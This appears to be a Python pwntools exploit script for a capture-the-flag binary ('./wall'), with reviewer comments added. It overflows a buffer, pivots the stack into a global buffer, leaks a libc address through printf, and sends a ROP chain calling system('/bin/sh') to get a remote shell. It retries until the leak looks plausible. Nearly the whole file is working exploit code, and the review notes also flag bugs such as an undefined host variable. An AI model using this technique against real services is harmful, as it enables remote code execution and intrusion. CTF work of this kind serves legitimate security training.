# yaru ("do it")
# Fiddle rbp/rsp to move the stack into `message`, then ROP.
# NOTE(review): pwntools harness against a CTF-style target ("./wall") that
# retries the connection until the leaked libc address looks plausible.
from pwn import *
elf = ELF("./wall")
libc = ELF("./libc.so.6")
while True:
    try:
        # NOTE(review): `arupaka` is not defined anywhere in this paste — presumably
        # a host/port placeholder for remote(); as written this raises NameError.
        p = remote(arupaka)
        # Hard-coded addresses inside the target binary (0x40xxxx — looks non-PIE; confirm).
        leave_ret = 0x401261
        pop_rbp_ret = 0x40115d  # unused below
        call_printf_in_get_name = 0x401191
        # Stage 1: 0x880 filler bytes, a value pointing just inside `message`, then
        # `leave; ret` so that (per the note above) rsp is redirected into `message`.
        payload = b'A'*(0x800+0x80)
        payload += p64(elf.sym.message + 0x800 - 8)
        payload += p64(leave_ret)
        p.sendline(payload)
        # Stage 2: eight (address, call-printf) pairs; presumably these are what
        # ends up in `message` and gets executed after the pivot — confirm.
        p.sendline((p64(elf.sym.message+0x800+0x80)+p64(call_printf_in_get_name))*8)
        p.recvline()
        # Leak: read 6 bytes of printf output, zero-pad to 8, subtract a hard-coded
        # offset (0x62050) specific to this libc build.
        libc.address = u64(p.recv(6, timeout=1).ljust(8, b'\0')) - 0x62050
        # Retry unless the result looks like a 0x7f... userland mapping.
        if libc.address & 0x7f0000000000 != 0x7f0000000000:
            p.close()
            continue
        print('libc_base:', hex(libc.address))
        # Stage 3: pop rdi; "/bin/sh"; system (gadget offset hard-coded for this libc).
        pop_rdi = libc.address + 0x001bbea1
        binsh = next(libc.search(b'/bin/sh\0'))
        system = libc.sym.system
        rop = p64(pop_rdi)
        rop += p64(binsh)
        rop += p64(system)
        p.sendline(rop)
        p.recvline()
        # Sanity check that a shell answers before handing over the terminal.
        # NOTE(review): if the echo check fails, the connection is not closed
        # before the loop continues.
        p.sendline(b'echo asdf')
        if p.recvline() == b'asdf\n':
            p.interactive()
            break
    except KeyboardInterrupt:
        # NOTE(review): if remote() itself raised, `p` is unbound here and
        # p.close() raises NameError — same for the handler below.
        p.close()
        break
    except:
        # NOTE(review): bare except swallows every error and retries forever;
        # `except Exception` would be narrower and keep SystemExit working.
        p.close()
        continue